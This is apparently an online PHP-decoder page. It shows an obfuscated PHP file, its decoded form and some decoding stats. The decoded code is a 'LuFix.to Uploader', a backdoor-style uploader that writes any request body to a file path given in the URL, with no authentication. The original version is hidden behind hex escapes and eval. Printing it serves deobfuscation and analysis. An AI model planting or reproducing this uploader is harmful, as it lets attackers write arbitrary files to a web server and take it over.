Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ${"GL\x4f\x42ALS"}["u\x71on\x6cd\x77\x6eu\x79d"]="t\x65\x78\x74";echo "<h\x34>\x4c\x..

Decoded Output download

<h4>LuFix.to Uploader</h4>
<input type="file" id="upload_files" name="upload_files" multiple="multiple">
<button id="b" value="upload" onclick='upload("upload_files",0);'>Upload</button>
<br><p>Status : <span id="status" style="color:red;">No file added</span></p>
<script>
function upload(fileInputId, fileIndex)
    {
		var url = window.location.pathname;
		var scriptname = url.substring(url.lastIndexOf('/')+1);
		var filename = document.getElementById('upload_files').value;
		var filename = filename.match(/[^\/]*\$/)[0];
		document.getElementById("status").textContent = "Uploading the file "+filename+", please wait..";
		document.getElementById("status").style.color = "blue";
        // take the file from the input
        var file = document.getElementById(fileInputId).files[fileIndex];
        var reader = new FileReader();
        reader.readAsBinaryString(file); // alternatively you can use readAsDataURL
        reader.onloadend  = function(evt)
        {
                // create XHR instance
                xhr = new XMLHttpRequest();

                // send the file through POST
                xhr.open("POST", scriptname+"?name="+filename, true);

                // make sure we have the sendAsBinary method on all browsers
                XMLHttpRequest.prototype.mySendAsBinary = function(text){
                    var data = new ArrayBuffer(text.length);
                    var ui8a = new Uint8Array(data, 0);
                    for (var i = 0; i < text.length; i++) ui8a[i] = (text.charCodeAt(i) & 0xff);

                    if(typeof window.Blob == "function")
                    {
                         var blob = new Blob([data]);
                    }else{
                         var bb = new (window.MozBlobBuilder || window.WebKitBlobBuilder || window.BlobBuilder)();
                         bb.append(data);
                         var blob = bb.getBlob();
                    }

                    this.send(blob);
                }

                // let's track upload progress
                var eventSource = xhr.upload || xhr;
                eventSource.addEventListener("progress", function(e) {
                    // get percentage of how much of the current file has been sent
                    var position = e.position || e.loaded;
                    var total = e.totalSize || e.total;
                    var percentage = Math.round((position/total)*100);

                    // here you should write your own code how you wish to proces this
                });

                // state change observer - we need to know when and if the file was successfully uploaded
                xhr.onreadystatechange = function()
                {
                    if(xhr.readyState == 4)
                    {
                        if(xhr.status == 200)
                        {
                            // process success
							document.getElementById("status").textContent = "The file "+filename+" Uploaded successfully in same folder.";
							document.getElementById("status").style.color = "green";
                        }else{
                            // process error
                        }
                    }
                };

                // start sending
                xhr.mySendAsBinary(evt.target.result);
        };
    }
</script>
if(!empty(\$_GET["name"])){
	\$inputHandler = fopen("php://input", "r");
	\$fileHandler = fopen(\$_GET["name"], "w+");
	while(true) {
		\$buffer = fgets(\$inputHandler, 4096);
		if (strlen(\$buffer) == 0) {
			fclose(\$inputHandler);
			fclose(\$fileHandler);
			return true;
		}
		fwrite(\$fileHandler, \$buffer);
	}
}

Did this file decode correctly?

Original Code

<?php ${"GL\x4f\x42ALS"}["u\x71on\x6cd\x77\x6eu\x79d"]="t\x65\x78\x74";echo "<h\x34>\x4c\x75\x46i\x78\x2e\x74o\x20\x55plo\x61\x64e\x72\x3c/\x684\x3e\n\x3c\x69npu\x74\x20type\x3d\"f\x69l\x65\"\x20\x69d\x3d\x22up\x6c\x6fa\x64_f\x69l\x65\x73\" n\x61me=\x22up\x6co\x61\x64_\x66\x69l\x65\x73\x22\x20m\x75l\x74i\x70l\x65=\x22m\x75\x6ct\x69\x70\x6ce\"\x3e\n<\x62\x75tto\x6e\x20i\x64\x3d\"b\" va\x6cue\x3d\"\x75\x70\x6c\x6f\x61\x64\"\x20\x6f\x6ec\x6c\x69\x63k\x3d\x27\x75\x70\x6c\x6fa\x64(\x22u\x70lo\x61\x64\x5ff\x69\x6ces\x22,\x30);\x27\x3eUp\x6co\x61d</\x62u\x74t\x6f\x6e\x3e\n\x3c\x62\x72>\x3c\x70\x3e\x53\x74a\x74u\x73 :\x20<s\x70\x61\x6e \x69\x64=\"\x73\x74a\x74\x75\x73\"\x20\x73\x74yl\x65=\x22\x63olor:\x72e\x64\x3b\x22\x3eNo\x20fi\x6c\x65\x20ad\x64ed</sp\x61n\x3e\x3c/p>\n\x3cs\x63r\x69\x70\x74>\n\x66\x75nc\x74\x69o\x6e\x20up\x6c\x6fad(\x66ileInp\x75\x74\x49d, \x66i\x6ceI\x6e\x64\x65\x78)\n \x20\x20\x20{\n\t\t\x76a\x72 \x75r\x6c\x20\x3d wi\x6ed\x6f\x77\x2elo\x63\x61\x74io\x6e.\x70\x61th\x6e\x61m\x65\x3b\n\t\tv\x61r \x73\x63rip\x74nam\x65\x20\x3d u\x72\x6c\x2e\x73\x75\x62st\x72\x69\x6e\x67(\x75r\x6c.l\x61s\x74\x49nd\x65\x78\x4f\x66('/')+\x31);\n\t\t\x76\x61r\x20\x66il\x65nam\x65 \x3d\x20\x64o\x63\x75\x6d\x65n\x74.g\x65tElem\x65\x6e\x74\x42\x79\x49d(\x27\x75p\x6c\x6f\x61\x64\x5f\x66i\x6ces\x27).v\x61\x6c\x75\x65;\n\t\t\x76\x61\x72\x20fi\x6c\x65na\x6d\x65\x20\x3d \x66\x69\x6c\x65\x6ea\x6d\x65\x2em\x61\x74\x63\x68(/[^\x5c\x5c/]*\$/)[\x30];\n\t\tdocum\x65\x6et\x2e\x67\x65\x74\x45lemen\x74\x42yI\x64(\x22s\x74\x61\x74\x75\x73\x22).te\x78tC\x6fn\x74\x65n\x74\x20\x3d\x20\x22U\x70l\x6f\x61\x64ing t\x68\x65\x20\x66\x69\x6ce \"+f\x69\x6cen\x61m\x65+\x22,\x20\x70l\x65\x61s\x65\x20\x77\x61\x69t\x2e.\x22;\n\t\t\x64o\x63\x75\x6den\x74\x2ege\x74\x45le\x6de\x6e\x74\x42\x79\x49\x64(\x22s\x74a\x74\x75s\x22).\x73t\x79\x6ce.c\x6f\x6c\x6fr \x3d\x20\"blu\x65\x22\x3b\n\x20  \x20 \x20\x20\x20// \x74ak\x65\x20th\x65 \x66ile \x66\x72o\x6d t\x68\x65 \x69\x6eput\n  \x20\x20\x20  \x20v\x61r f\x69\x6c\x65 \x3d \x64\x6f\x63\x75me\x6e\x74\x2eg\x65\x74E\x6ceme\x6e\x74\x42yId(\x66\x69\x6c\x65In\x70\x75t\x49\x64).\x66\x69l\x65s[\x66i\x6c\x65I\x6edex]\x3b\n\x20\x20 \x20\x20\x20\x20 \x76ar read\x65\x72\x20=\x20\x6e\x65\x77 \x46il\x65\x52ea\x64\x65\x72();\n\x20\x20\x20\x20   \x20re\x61d\x65r.\x72\x65ad\x41\x73Binar\x79\x53tr\x69ng(fi\x6ce); // a\x6c\x74e\x72n\x61\x74\x69v\x65\x6c\x79\x20\x79\x6fu\x20\x63a\x6e \x75\x73e\x20\x72\x65\x61\x64As\x44\x61\x74\x61\x55\x52L\n \x20 \x20  \x20\x20re\x61d\x65r\x2e\x6f\x6el\x6f\x61d\x65n\x64\x20 =\x20\x66\x75\x6e\x63t\x69\x6f\x6e(\x65\x76\x74)\n \x20   \x20 \x20{\n\x20   \x20 \x20\x20\x20\x20\x20 \x20\x20  //\x20cr\x65a\x74e \x58\x48\x52\x20\x69\x6e\x73\x74\x61\x6ece\n\x20\x20\x20  \x20   \x20   \x20\x20 \x78h\x72 \x3d new X\x4d\x4c\x48\x74t\x70\x52equ\x65st();\n\n \x20 \x20    \x20  \x20 \x20\x20 // s\x65n\x64 t\x68e \x66\x69le\x20\x74\x68\x72\x6fu\x67h\x20\x50\x4f\x53\x54\n   \x20\x20\x20 \x20\x20    \x20  xh\x72\x2e\x6fp\x65n(\x22\x50\x4f\x53\x54\x22,\x20\x73\x63\x72\x69\x70\x74\x6e\x61\x6d\x65+\x22?\x6eam\x65=\"+f\x69\x6ce\x6eame, \x74\x72u\x65)\x3b\n\n  \x20 \x20\x20   \x20 \x20\x20\x20 \x20//\x20\x6da\x6b\x65 sure \x77e \x68a\x76\x65\x20\x74he\x20sendAsBinary m\x65\x74\x68o\x64 on \x61ll\x20b\x72o\x77\x73e\x72s\n \x20 \x20  \x20  \x20\x20\x20\x20\x20\x20 XM\x4cH\x74t\x70\x52eq\x75\x65\x73t.\x70r\x6f\x74\x6ft\x79p\x65\x2emySe\x6ed\x41sB\x69\x6e\x61\x72\x79 = \x66u\x6ec\x74i\x6f\x6e(\x74ext){\n\x20\x20\x20\x20  \x20  \x20\x20\x20  \x20\x20 \x20  var\x20data\x20= \x6eew \x41rray\x42\x75\x66\x66er(t\x65xt\x2e\x6c\x65\x6eg\x74h);\n \x20\x20 \x20   \x20\x20 \x20\x20  \x20\x20\x20 \x20va\x72 ui8\x61\x20\x3d\x20n\x65\x77\x20\x55\x69n\x74\x38\x41rra\x79(d\x61t\x61,\x200)\x3b\n\x20    \x20\x20\x20 \x20\x20         for (v\x61r i \x3d\x20\x30\x3b\x20i <\x20\x74\x65\x78\x74.l\x65n\x67t\x68;\x20\x69++)\x20u\x69\x38\x61[\x69]\x20=\x20(\x74ext.\x63\x68ar\x43od\x65At(i)\x20\x26\x20\x30xf\x66)\x3b\n\n  \x20\x20\x20\x20 \x20  \x20\x20 \x20 \x20\x20 \x20 if(t\x79p\x65\x6ff\x20win\x64\x6fw.Blo\x62 =\x3d\x20\x22f\x75\x6e\x63t\x69\x6fn\x22)\n      \x20 \x20\x20\x20 \x20    \x20 \x20{\n\x20\x20  \x20\x20\x20\x20   \x20\x20 \x20 \x20\x20\x20\x20     va\x72\x20\x62lo\x62\x20\x3d\x20n\x65\x77\x20B\x6c\x6f\x62([d\x61t\x61]);\n\x20  \x20\x20\x20\x20    \x20 \x20 \x20\x20 \x20 }el\x73e{\n \x20 \x20\x20\x20\x20  \x20\x20\x20\x20\x20\x20 \x20\x20\x20 \x20 \x20 \x20v\x61\x72 b\x62\x20\x3d\x20ne\x77\x20(w\x69n\x64o\x77\x2e\x4dozB\x6c\x6fbB\x75i\x6cder || \x77\x69\x6e\x64ow.We\x62\x4bit\x42lobB\x75i\x6c\x64\x65\x72\x20||\x20w\x69\x6ed\x6f\x77.\x42\x6c\x6fbBu\x69\x6c\x64\x65\x72)()\x3b\n     \x20\x20 \x20 \x20\x20 \x20\x20\x20 \x20\x20\x20\x20\x20   b\x62.appe\x6e\x64(d\x61\x74a);\n \x20   \x20  \x20 \x20 \x20\x20 \x20   \x20  \x20  \x76\x61r b\x6c\x6fb \x3d \x62\x62.\x67\x65tBlo\x62()\x3b\n     \x20  \x20  \x20\x20 \x20\x20\x20   }\n\n \x20\x20\x20   \x20 \x20 \x20  \x20\x20\x20\x20\x20\x20t\x68i\x73.s\x65\x6e\x64(\x62\x6co\x62)\x3b\n\x20   \x20\x20 \x20  \x20\x20\x20\x20  }\n\n\x20\x20 \x20 \x20   \x20\x20\x20 \x20\x20 //\x20\x6ce\x74's\x20tr\x61ck u\x70lo\x61d\x20prog\x72e\x73\x73\n\x20\x20 \x20  \x20\x20\x20   \x20\x20\x20\x20\x76\x61\x72 event\x53\x6fu\x72\x63e = \x78h\x72.up\x6coa\x64\x20|| \x78h\x72\x3b\n\x20 \x20  \x20\x20\x20  \x20\x20\x20\x20  ev\x65\x6etS\x6fur\x63\x65\x2e\x61\x64d\x45\x76\x65nt\x4c\x69\x73\x74ener(\"p\x72o\x67r\x65\x73\x73\x22,\x20\x66\x75\x6e\x63\x74i\x6fn(\x65) {\n  \x20\x20\x20\x20   \x20\x20   \x20 \x20\x20\x20\x20//\x20ge\x74\x20\x70e\x72c\x65\x6etag\x65 o\x66 h\x6f\x77 \x6d\x75\x63\x68\x20o\x66\x20\x74h\x65\x20cu\x72\x72\x65\x6e\x74 f\x69\x6ce \x68a\x73\x20been\x20s\x65nt\n\x20\x20  \x20 \x20 \x20\x20  \x20\x20   \x20  va\x72\x20\x70o\x73\x69t\x69o\x6e \x3d\x20\x65\x2e\x70osi\x74ion || \x65.\x6coade\x64\x3b\n\x20\x20   \x20   \x20  \x20\x20\x20\x20\x20\x20\x20 var\x20\x74ot\x61l \x3d\x20e\x2e\x74\x6f\x74a\x6c\x53ize\x20||\x20\x65.\x74\x6ft\x61\x6c\x3b\n\x20  \x20 \x20\x20 \x20\x20\x20\x20\x20\x20\x20  \x20 \x20v\x61r \x70\x65\x72\x63\x65\x6et\x61\x67e = Ma\x74h\x2e\x72ou\x6ed((\x70ositi\x6fn/\x74\x6ftal)*\x3100);\n\n\x20\x20  \x20\x20\x20 \x20\x20\x20     \x20 \x20\x20//\x20\x68\x65\x72\x65 \x79\x6f\x75 \x73\x68\x6f\x75\x6cd\x20\x77\x72\x69\x74\x65 y\x6f\x75\x72 \x6fw\x6e\x20co\x64\x65\x20how you w\x69sh \x74\x6f\x20p\x72\x6f\x63\x65\x73 \x74h\x69s\n \x20      \x20 \x20\x20    })\x3b\n\n        \x20 \x20 \x20   // \x73tate c\x68\x61nge \x6fb\x73erve\x72 -\x20we\x20\x6ee\x65\x64 t\x6f \x6b\x6e\x6f\x77\x20wh\x65\x6e\x20and i\x66\x20the\x20fi\x6ce\x20\x77as s\x75\x63\x63\x65ss\x66\x75ll\x79\x20u\x70l\x6fa\x64\x65\x64\n\x20\x20\x20\x20\x20  \x20   \x20\x20\x20 \x20\x78\x68r\x2eon\x72\x65a\x64\x79sta\x74\x65change =\x20f\x75n\x63tio\x6e()\n\x20  \x20\x20\x20\x20 \x20 \x20  \x20\x20 {\n \x20 \x20\x20   \x20   \x20     \x20 i\x66(\x78\x68\x72\x2e\x72\x65\x61\x64\x79\x53\x74at\x65 ==\x204)\n\x20\x20 \x20\x20 \x20\x20\x20 \x20\x20     \x20  {\n\x20   \x20 \x20\x20\x20   \x20  \x20\x20\x20 \x20\x20\x20\x20 if(x\x68\x72\x2es\x74\x61\x74us\x20\x3d=\x2020\x30)\n\x20  \x20 \x20         \x20 \x20 \x20\x20\x20  {\n\x20\x20\x20  \x20\x20  \x20\x20\x20\x20 \x20   \x20 \x20  \x20  \x20 // p\x72\x6f\x63\x65ss \x73u\x63\x63e\x73s\n\t\t\t\t\t\t\tdo\x63\x75m\x65n\x74\x2ege\x74\x45l\x65m\x65ntBy\x49d(\x22s\x74\x61\x74\x75\x73\x22).\x74\x65x\x74\x43o\x6e\x74\x65\x6et = \"\x54he\x20\x66\x69\x6c\x65\x20\x22+fi\x6cena\x6de+\x22 \x55\x70l\x6fad\x65\x64\x20su\x63\x63\x65\x73sfu\x6c\x6cy\x20\x69\x6e s\x61\x6de\x20\x66o\x6cd\x65\x72.\"\x3b\n\t\t\t\t\t\t\t\x64o\x63\x75m\x65\x6et\x2e\x67\x65\x74El\x65\x6de\x6etB\x79Id(\"s\x74\x61t\x75\x73\").\x73\x74\x79le.\x63\x6f\x6co\x72 =\x20\x22gr\x65\x65n\"\x3b\n  \x20\x20\x20     \x20\x20\x20  \x20 \x20\x20\x20    }\x65\x6c\x73\x65{\n\x20\x20  \x20\x20\x20   \x20   \x20   \x20 \x20\x20\x20\x20  \x20\x20//\x20\x70ro\x63ess\x20\x65r\x72or\n \x20        \x20\x20\x20\x20  \x20\x20 \x20\x20  \x20}\n      \x20   \x20\x20\x20  \x20 \x20 \x20}\n\x20\x20\x20 \x20   \x20   \x20\x20  }\x3b\n\n    \x20\x20\x20\x20 \x20  \x20\x20\x20\x20// \x73\x74art\x20sendi\x6e\x67\n  \x20\x20 \x20\x20\x20\x20  \x20\x20\x20\x20\x20xh\x72\x2emy\x53\x65\x6ed\x41s\x42\x69n\x61\x72\x79(\x65\x76\x74.\x74\x61\x72get.\x72esu\x6ct)\x3b\n\x20\x20 \x20\x20   };\n\x20\x20 \x20}\n</\x73c\x72ip\x74\x3e\n";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x74\x68\x78\x72\x65iuww"]="\x74e\x78\x74";${${"G\x4c\x4fB\x41\x4c\x53"}["\x75\x71\x6f\x6e\x6c\x64\x77nu\x79\x64"]}="i\x66(!em\x70t\x79(ss\x64\x64ddd\x64dd_GET[\x22n\x61m\x65\"])){\n\t\x73\x73\x64dd\x64\x64\x64\x64\x64i\x6epu\x74H\x61\x6ed\x6c\x65\x72\x20= \x66\x6fp\x65\x6e(\x22\x70h\x70://\x69\x6e\x70ut\x22, \"\x72\")\x3b\n\ts\x73dd\x64\x64\x64\x64\x64d\x66i\x6c\x65\x48an\x64\x6c\x65r\x20\x3d fope\x6e(s\x73dd\x64d\x64d\x64\x64\x5fGET[\x22\x6e\x61m\x65\"], \"w+\")\x3b\n\twh\x69l\x65(tru\x65) {\n\t\t\x73s\x64\x64d\x64\x64dd\x64bu\x66fer =\x20f\x67\x65t\x73(ssdddddd\x64d\x69\x6e\x70u\x74Ha\x6e\x64le\x72, 4\x309\x36)\x3b\n\t\t\x69\x66\x20(st\x72l\x65n(s\x73d\x64d\x64\x64ddd\x62\x75ffe\x72) \x3d\x3d\x200)\x20{\n\t\t\tf\x63\x6c\x6f\x73e(\x73s\x64ddd\x64dd\x64\x69n\x70ut\x48andler);\n\t\t\tf\x63lo\x73e(s\x73\x64ddd\x64\x64\x64\x64\x66\x69\x6c\x65\x48\x61ndler)\x3b\n\t\t\t\x72\x65t\x75\x72n\x20true\x3b\n\t\t}\n\t\tf\x77\x72\x69te(\x73\x73dd\x64\x64\x64\x64\x64d\x66\x69\x6ceHand\x6c\x65r,\x20\x73sddddd\x64\x64\x64\x62\x75f\x66e\x72);\n\t}\n}";eval(str_replace("s\x73d\x64d\x64\x64d\x64\x64","\$",${${"\x47L\x4fBA\x4c\x53"}["\x74\x68\x78r\x65\x69\x75\x77w"]}));
?>

Function Calls

str_replace 1

Variables

text if(!empty(ssdddddddd_GET["name"])){ ssddddddddinputHandler ..
GLOBALS [{'key': 'uqonldwnuyd', 'value': 'text'}, {'key': 'thxreiuww', 'value': 'text'}]

Stats

MD5 ec120666f1539c73eeed21ce9876656a
Eval Count 1
Decode Time 53 ms